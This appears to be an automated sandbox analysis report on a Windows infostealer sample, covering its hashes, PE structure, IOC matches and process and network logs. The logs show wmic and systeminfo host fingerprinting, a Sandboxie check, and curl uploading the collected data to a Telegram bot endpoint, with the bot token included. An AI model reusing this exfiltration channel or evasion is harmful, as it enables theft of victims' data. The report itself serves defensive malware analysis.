                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                    • Not all processes where analyzed, report is missing behavior information
                    • Report size exceeded maximum capacity and may have missing behavior information.
                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                    • VT rate limit hit for: 9KEZfGRjyK.exe
                    No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
149.154.167.220 | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer |
| PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
| PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT |
| 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger |
| _Company.exe | malicious | Snake Keylogger, VIP Keylogger |
| F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger |
| D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger |
| Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger |
| PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
api.telegram.org | PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
| PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
| 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
| _Company.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
| F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220
| D.G Governor Istek,Docx.exe | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220
| Nuevo pedido de cotizaci#U00f3n 663837 4899272.pdf.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
| PAYMENT SWIFT AND SOA TT07180016-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
| chrome11.exe | malicious | Unknown | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TELEGRAMRU | file.exe | malicious | NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer | 149.154.167.220
| file.exe | malicious | ScreenConnect Tool, LummaC, Amadey, Cryptbot, LummaC Stealer, Vidar | 149.154.167.99
| PURCHASE ORDER TRC-090971819130-24_pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
| PAYMENT ADVICE 750013-1012449943-81347-pdf.exe | malicious | GuLoader, MassLogger RAT | 149.154.167.220
| 66776676676.exe | malicious | GuLoader, Snake Keylogger, VIP Keylogger | 149.154.167.220
| pM3fQBuTLy.exe | malicious | Vidar | 149.154.167.99
| QIo3SytSZA.exe | malicious | Vidar | 149.154.167.99
| _Company.exe | malicious | Snake Keylogger, VIP Keylogger | 149.154.167.220
| F.O Pump Istek,Docx.bat | malicious | DBatLoader, PureLog Stealer, Snake Keylogger | 149.154.167.220
Match | Associated Sample Name / URL | Detection | Threat Name | Context
74954a0c86284d0d6e1c4efefe92b521 | Hkeyboard.dll | malicious | Unknown | 149.154.167.220
| 67618a47ee8c5.vbs | malicious | Mint Stealer | 149.154.167.220
| PKO_0019868519477_PDF_#U2462#U2465#U2461#U2465#U2467#U2464#U2464#U2466.hta | malicious | Mint Stealer | 149.154.167.220
| webhook.exe | malicious | Unknown | 149.154.167.220
| loader.exe | malicious | Unknown | 149.154.167.220
| loader.exe | malicious | Unknown | 149.154.167.220
| chos.exe | malicious | Unknown | 149.154.167.220
| file.exe | malicious | Unknown | 149.154.167.220
| yiDQb6GkBq.exe | malicious | Amadey, LummaC Stealer, Vidar | 149.154.167.220
                                      No context
                                      Process:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                      File Type:ASCII text, with CRLF, CR, LF line terminators
                                      Category:dropped
                                      Size (bytes):3358
                                      Entropy (8bit):4.791561075407849
                                      Encrypted:false
                                      SSDEEP:96:z5KdsjuDyC2+IO8WQSkKdQevBh+Uq1OcCX8:9KdUC2+XhQSkKJJhtLX8
                                      MD5:F4D3002C25DCD1A598654E64A975DBCC
                                      SHA1:9C43AF74974F4952478416121A6A12127AE2136E
                                      SHA-256:A7399E3071E0477668D288F205BDE73A3FB858E55AD7EACC1EA6DE9E7BBCE92E
                                      SHA-512:7F7C99F0974F923DE8022802B9F8C83C627672F0E70470404A1E87D41886B42A83998486E3EE75709C8C75CE03FBD74B2CA5D59AF804FA22B4BF4308DE13DAFE
                                      Malicious:false
                                      Preview:Computer Name: user-PC.User Name: user.BIOS Serial Number: SerialNumber ...C5XHUPDMPN.Motherboard Serial Number: SerialNumber ...6347204322332955.CPU Info: Name ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz ...Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz.Total RAM: TotalPhysicalMemory ...4293971968.Disk Info: Model Size ...ZTSOLTV4 SCSI Disk Device 412300001200.Antivirus: displayName ...Windows Defender.MAC Address: Physical Address Transport Name ..=================== ==========================================================..EC-F4-BB-EA-15-88 \Device\Tcpip_{E3B92EAA-F5C7-47F8-A487-F466F42035A1}.System Info: Host Name: user-PC..OS Name: Microsoft Windows 10 Pro..OS Version: 10.0.19045 N/A Build 19045..OS Manufacturer: Microsoft Corporation..OS Configuration: Standalone Workstation..OS Build Type:
                                      Process:C:\Windows\System32\curl.exe
                                      File Type:ASCII text, with CRLF, CR line terminators
                                      Category:dropped
                                      Size (bytes):478
                                      Entropy (8bit):3.2730702919143195
                                      Encrypted:false
                                      SSDEEP:6:I2swj2SAykymUeC3/8UniegCSgOgcdivIdpVvTmV96DA2FcaV//IJ96R:Vz6ykymUePbnc9cdd7riKA2FN1ImR
                                      MD5:671EE09B65B69E3F51F1C11059CD158F
                                      SHA1:910C897ECB9DC7D3E9CB85C41AF9FA75282841AA
                                      SHA-256:F54DC2E3A6025115D306B7EA462D969CFC890127B623C43582F19218AA3026DC
                                      SHA-512:72051024BC1C4C17DACF71B214E38FDC509008E9F4F701E6111211F8E1AFB0178A98705166D4FAA06AB6829FDE27C90A7F56E748486DFE8C3DC42BBDC50E1E78
                                      Malicious:false
                                      Preview: % Total % Received % Xferd Average Speed Time Time Time Current.. Dload Upload Total Spent Left Speed... 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0. 0 0 0 0 0 0 0 0 --:--:-- 0:00:01 --:--:-- 0.100 3664 0 0 100 3664 0 1445 0:00:02 0:00:02 --:--:-- 1446.100 4130 100 466 100 3664 180 1417 0:00:02 0:00:02 --:--:-- 1599..
                                      File type:PE32+ executable (GUI) x86-64, for MS Windows
                                      Entropy (8bit):6.301112846910871
                                      TrID:
                                      • Win64 Executable GUI (202006/5) 92.65%
                                      • Win64 Executable (generic) (12005/4) 5.51%
                                      • Generic Win/DOS Executable (2004/3) 0.92%
                                      • DOS Executable Generic (2002/1) 0.92%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:9KEZfGRjyK.exe
                                      File size:378'880 bytes
                                      MD5:73b0e64dcc0df2f2ac4d461245021e6a
                                      SHA1:ff75ef00e33fb953964d6bbe1d86d5ad8bb8c9ba
                                      SHA256:99a4d0ac34848d665529220a0a04edd2753aba9ffe8434286967875d05643400
                                      SHA512:e6921dcba48d193bd592d316613a3fffc7bdf03868ff07dd2553cc32bbf2318dc54f777a90ecb2c2782471567f7657f9185f65814e43e7c0f5d820593ccbcf99
                                      SSDEEP:6144:lE3fAFcnP6AAHOZ7Uh2EaGQGGapOdTFTh8kJM1VZn:lE34FgAEGQGGTx+WM1
                                      TLSH:B9845B25FE565DACD58BC0B482128A726932B8CE0B31B9FF12D442353E69AF16F3C754
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......H7...V`..V`..V`......V`...c..V`...d..V`...e.$V`.G.a..V`..Va..V`..V`.6V`......V`...b..V`.Rich.V`.........PE..d.....dg.........."
                                      Icon Hash:90cececece8e8eb0
                                      Entrypoint:0x140038d60
                                      Entrypoint Section:.text
                                      Digitally signed:false
                                      Imagebase:0x140000000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x67648104 [Thu Dec 19 20:24:36 2024 UTC]
                                      TLS Callbacks:0x4002a890, 0x1
                                      CLR (.Net) Version:
                                      OS Version Major:6
                                      OS Version Minor:0
                                      File Version Major:6
                                      File Version Minor:0
                                      Subsystem Version Major:6
                                      Subsystem Version Minor:0
                                      Import Hash:df132870cc8376ee210867916013d887
                                      Instruction
                                      dec eax
                                      sub esp, 28h
                                      call 00007F13A49273E8h
                                      dec eax
                                      add esp, 28h
                                      jmp 00007F13A4926F77h
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      int3
                                      nop word ptr [eax+eax+00000000h]
                                      dec eax
                                      sub esp, 10h
                                      dec esp
                                      mov dword ptr [esp], edx
                                      dec esp
                                      mov dword ptr [esp+08h], ebx
                                      dec ebp
                                      xor ebx, ebx
                                      dec esp
                                      lea edx, dword ptr [esp+18h]
                                      dec esp
                                      sub edx, eax
                                      dec ebp
                                      cmovb edx, ebx
                                      dec esp
                                      mov ebx, dword ptr [00000010h]
                                      dec ebp
                                      cmp edx, ebx
                                      jnc 00007F13A4927118h
                                      inc cx
                                      and edx, 8D4DF000h
                                      wait
                                      add al, dh
                                      Programming Language:
                                      • [IMP] VS2008 SP1 build 30729
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x582bc | 0x104 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x5f000 | 0x1f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x5b000 | 0x2a9c | .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x60000 | 0x668 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x50ff0 | 0x54 | .rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x51200 | 0x28 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x50eb0 | 0x140 | .rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x40000 | 0x458 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                       Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                       .text | 0x1000 | 0x3ed70 | 0x3ee00 | b18ef078dbb571020d954c6b115eb34c | False | 0.4967344371272366 | data | 6.355785043053073 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                       .rdata | 0x40000 | 0x192fa | 0x19400 | a57eadc0bc392731421b1ee050a6b056 | False | 0.38722153465346537 | data | 5.407331463120315 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .data | 0x5a000 | 0xac0 | 0x200 | cdb4f452a9c373c6ece62e34b50b2fbe | False | 0.28515625 | data | 2.4546151187241256 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                       .pdata | 0x5b000 | 0x2a9c | 0x2c00 | a18a17c2855b033d9d8056b0eb1b3c8c | False | 0.4833984375 | data | 5.455692511911118 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .padding | 0x5e000 | 0x8a4 | 0xa00 | 7b7f26e348909ab91cf74011db8d3a94 | False | 0.891015625 | data | 7.3761949714995865 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .rsrc | 0x5f000 | 0x1f8 | 0x200 | f63d27195363577233775bb9fd0e9a51 | False | 0.484375 | data | 2.830251446092126 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                       .reloc | 0x60000 | 0x668 | 0x800 | e005ebc65f734c9ef812873e4dc54879 | False | 0.5458984375 | data | 4.849281107799458 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                       Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                       RT_VERSION | 0x5f060 | 0x198 | OpenPGP Public Key | English | United States | 0.5122549019607843
                                       DLL | Import
                                       api-ms-win-core-synch-l1-2-0.dll | WakeByAddressAll, WakeByAddressSingle, WaitOnAddress
                                       bcryptprimitives.dll | ProcessPrng
                                       bcrypt.dll | BCryptGenRandom
                                       ADVAPI32.dll | SystemFunction036
                                       kernel32.dll | EncodePointer, RaiseException, RtlPcToFileHeader, RtlUnwindEx, IsProcessorFeaturePresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, InitializeSListHead, GetStdHandle, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCurrentThreadId, WriteFileEx, SleepEx, GetExitCodeProcess, TerminateProcess, GetSystemTimePreciseAsFileTime, SetWaitableTimer, HeapReAlloc, lstrlenW, ReleaseMutex, FindClose, CreateWaitableTimerExW, GetFileInformationByHandle, GetFileInformationByHandleEx, GetCurrentThread, FindFirstFileW, ReadFile, GetOverlappedResult, CancelIo, GetCurrentProcess, SetThreadStackGuarantee, GetConsoleMode, SetFileInformationByHandle, GetModuleHandleW, GetModuleFileNameW, CreateNamedPipeW, ReadFileEx, WaitForMultipleObjects, GetFullPathNameW, GetSystemDirectoryW, GetWindowsDirectoryW, CreateProcessW, GetFileAttributesW, InitializeProcThreadAttributeList, UpdateProcThreadAttribute, MultiByteToWideChar, WriteConsoleW, WideCharToMultiByte, CreateThread, GetModuleHandleA, AddVectoredExceptionHandler, GetEnvironmentVariableW, GetEnvironmentStringsW, CompareStringOrdinal, GetCurrentDirectoryW, WaitForSingleObjectEx, LoadLibraryA, CreateMutexA, DeleteProcThreadAttributeList, FreeEnvironmentStringsW, GetTimeZoneInformationForYear, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, FormatMessageW, SetLastError, RtlVirtualUnwind, TlsAlloc, WaitForSingleObject, CreateEventW, TlsGetValue, TlsSetValue, GetLastError, TlsFree, HeapAlloc, FreeLibrary, RtlLookupFunctionEntry, GetProcAddress, HeapFree, GetProcessHeap, GetComputerNameExW, CloseHandle, RtlCaptureContext, QueryPerformanceCounter, DuplicateHandle, Sleep, CreateFileW, LoadLibraryExW
                                       ntdll.dll | RtlNtStatusToDosError, NtReadFile, NtWriteFile
                                       api-ms-win-crt-string-l1-1-0.dll | strcpy_s, wcsncmp
                                       api-ms-win-crt-runtime-l1-1-0.dll | exit, _initterm_e, _initialize_onexit_table, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, __p___argc, _set_app_type, _seh_filter_exe, _crt_atexit, terminate, __p___argv, abort, _cexit, _c_exit, _register_onexit_function, _exit, _register_thread_local_exe_atexit_callback, _initterm
                                       api-ms-win-crt-math-l1-1-0.dll | __setusermatherr
                                       api-ms-win-crt-stdio-l1-1-0.dll | __p__commode, _set_fmode
                                       api-ms-win-crt-locale-l1-1-0.dll | _configthreadlocale
                                       api-ms-win-crt-heap-l1-1-0.dll | calloc, malloc, free, _set_new_mode
                                       Language of compilation system | Country where language is spoken | Map
                                       English | United States |
                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Dec 19, 2024 22:53:17.641104937 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:17.641160965 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:17.641242027 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:17.653472900 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:17.653486967 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:19.020442963 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:19.020539999 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:19.021861076 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:19.021908045 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:19.022144079 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:19.025609016 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:19.025815964 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:19.025851965 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:20.075598955 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:20.075678110 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Dec 19, 2024 22:53:20.075772047 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:20.083760977 CET | 49770 | 443 | 192.168.2.4 | 149.154.167.220
                                       Dec 19, 2024 22:53:20.083801985 CET | 443 | 49770 | 149.154.167.220 | 192.168.2.4
                                       Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                       Dec 19, 2024 22:53:17.500544071 CET | 55178 | 53 | 192.168.2.4 | 1.1.1.1
                                       Dec 19, 2024 22:53:17.637466908 CET | 53 | 55178 | 1.1.1.1 | 192.168.2.4
                                       Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                       Dec 19, 2024 22:53:17.500544071 CET | 192.168.2.4 | 1.1.1.1 | 0x6215 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                       Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                       Dec 19, 2024 22:53:17.637466908 CET | 1.1.1.1 | 192.168.2.4 | 0x6215 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                      • api.telegram.org
                                       Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                       0 | 192.168.2.4 | 49770 | 149.154.167.220 | 443 | 5740 | C:\Windows\System32\curl.exe
                                       Timestamp | Bytes transferred | Direction | Data
                                       2024-12-19 21:53:19 UTC | 251 | OUT | POST /bot7068399075:AAEU8zRzCqB0URyCZuIuzOS0iXNMCPf1hu4/sendDocument HTTP/1.1
                                      Host: api.telegram.org
                                      User-Agent: curl/7.83.1
                                      Accept: */*
                                      Content-Length: 3664
                                      Content-Type: multipart/form-data; boundary=------------------------edbae48fbd31f91b
                                       2024-12-19 21:53:19 UTC | 3664 | OUT | Data Ascii: --------------------------edbae48fbd31f91bContent-Disposition: form-data; name="chat_id"-4193710271--------------------------edbae48fbd31f91bContent-Disposition: form-data; name="document"; filename="284330-4180-1.log"Content-Type: text/plain
                                       2024-12-19 21:53:20 UTC | 388 | IN | HTTP/1.1 200 OK
                                      Server: nginx/1.18.0
                                      Date: Thu, 19 Dec 2024 21:53:19 GMT
                                      Content-Type: application/json
                                      Content-Length: 466
                                      Connection: close
                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                      Access-Control-Allow-Origin: *
                                      Access-Control-Allow-Methods: GET, POST, OPTIONS
                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                       2024-12-19 21:53:20 UTC | 466 | IN | Data Ascii: {"ok":true,"result":{"message_id":3033,"from":{"id":7068399075,"is_bot":true,"first_name":"Virtualbeam","username":"Virtualbeam_bot"},"chat":{"id":-4193710271,"title":"Private - storage","type":"group","all_members_are_administrators":true},"date":1734645
                                      Target ID:0
                                      Start time:16:52:04
                                      Start date:19/12/2024
                                      Path:C:\Users\user\Desktop\9KEZfGRjyK.exe
                                      Wow64 process (32bit):false
                                      Commandline:"C:\Users\user\Desktop\9KEZfGRjyK.exe"
                                      Imagebase:0x7ff7f4100000
                                      File size:378'880 bytes
                                      MD5 hash:73B0E64DCC0DF2F2AC4D461245021E6A
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:low
                                      Has exited:true

                                      Target ID:1
                                      Start time:16:52:04
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" bios get serialnumber
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:2
                                      Start time:16:52:04
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:3
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" baseboard get serialnumber
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:4
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:5
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" cpu get name
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:6
                                      Start time:16:52:05
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:7
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" computersystem get totalphysicalmemory
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:8
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x720000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:9
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" diskdrive get model,size
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high
                                      Has exited:true

                                      Target ID:10
                                      Start time:16:52:07
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:11
                                      Start time:16:52:08
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\wbem\WMIC.exe
                                      Wow64 process (32bit):false
                                      Commandline:"wmic" /namespace:\\root\SecurityCenter2 path AntivirusProduct get displayName
                                      Imagebase:0x7ff6f2f80000
                                      File size:576'000 bytes
                                      MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:12
                                      Start time:16:52:08
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:13
                                      Start time:16:52:09
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\getmac.exe
                                      Wow64 process (32bit):false
                                      Commandline:"getmac"
                                      Imagebase:0x7ff7959e0000
                                      File size:90'112 bytes
                                      MD5 hash:7D4B72DFF5B8E98DD1351A401E402C33
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:14
                                      Start time:16:52:09
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:16
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\systeminfo.exe
                                      Wow64 process (32bit):false
                                      Commandline:"systeminfo"
                                      Imagebase:0x7ff6694a0000
                                      File size:110'080 bytes
                                      MD5 hash:EE309A9C61511E907D87B10EF226FDCD
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:17
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                      Imagebase:0x7ff7699e0000
                                      File size:862'208 bytes
                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:18
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\tasklist.exe
                                      Wow64 process (32bit):false
                                      Commandline:"tasklist" /m sbiedll.dll
                                      Imagebase:0x7ff793b00000
                                      File size:106'496 bytes
                                      MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Has exited:true

                                      Target ID:19
                                      Start time:16:52:10
                                      Start date:19/12/2024
                                      Path:C:\Windows\System32\conhost.exe
                                      Wow64 process (32bit):false
